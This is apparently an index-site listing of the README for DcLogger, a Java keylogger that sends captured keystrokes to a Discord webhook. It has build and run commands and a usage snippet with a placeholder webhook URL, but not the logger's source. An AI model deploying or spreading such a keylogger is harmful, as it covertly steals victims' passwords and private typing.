An open API service indexing awesome lists of open source software.

https://github.com/lyzev/dclogger

A simple keylogger which sends the keys to a discord webhook.
https://github.com/lyzev/dclogger

dclogger discord discord-webhook discordwebhook java java17 keylogger keylogger-discord-webhooks keylogger-webhook webhook

Last synced: 4 days ago
JSON representation

A simple keylogger which sends the keys to a discord webhook.

Awesome Lists containing this project

README

          

DcLogger

A simple key logger application which sends the keys to a discord webhook implemented in Java.


Discord



GitHub last commit
GitHub commit activity


GitHub code size in bytes
GitHub contributors

## Disclaimer
Please note, this repository is for educational and proof of concept purposes only. The information and code contained within it should not be used for any illegal or unethical activities. The contributors to this repository are not liable for any actions taken or damages caused by the use of the information or code provided here. It is the responsibility of the user to ensure compliance with all applicable laws and regulations, and to obtain any necessary permissions before using the code or information.

## Usage

### How to Build and Run Project
Build project:
```bash
mvn package
```
Run ./target/DcLogger-jar-with-dependencies.jar file using command:
```bash
java -jar ./target/DcLogger-jar-with-dependencies.jar
```
The keys will be sent to the provided webhook.

### Example
```java
/**
* This is an example on how to use {@link KeyLogger}.
*
* @throws MalformedURLException the exception is going to be thrown if the url is incorrect
*/
public static void main(String[] args) throws MalformedURLException {
KeyLogger logger = new KeyLogger("WEBHOOK-URL"); // Declares and initializes the keylogger
logger.start(); // Registers the NativeLogger (If it isn't registered the event will not be called, so nothing would be logged)
}
```

## Bugs and Suggestions
Bug reports and suggestions should be made in this repo's [issue tracker](https://github.com/Lyzev/DcLogger/issues) using the templates provided. Please provide as much information as you can to best help us understand your issue and give a better chance of it being resolved.

## Credits
* [vakho10](https://github.com/vakho10) for [java-keylogger](https://github.com/vakho10/java-keylogger)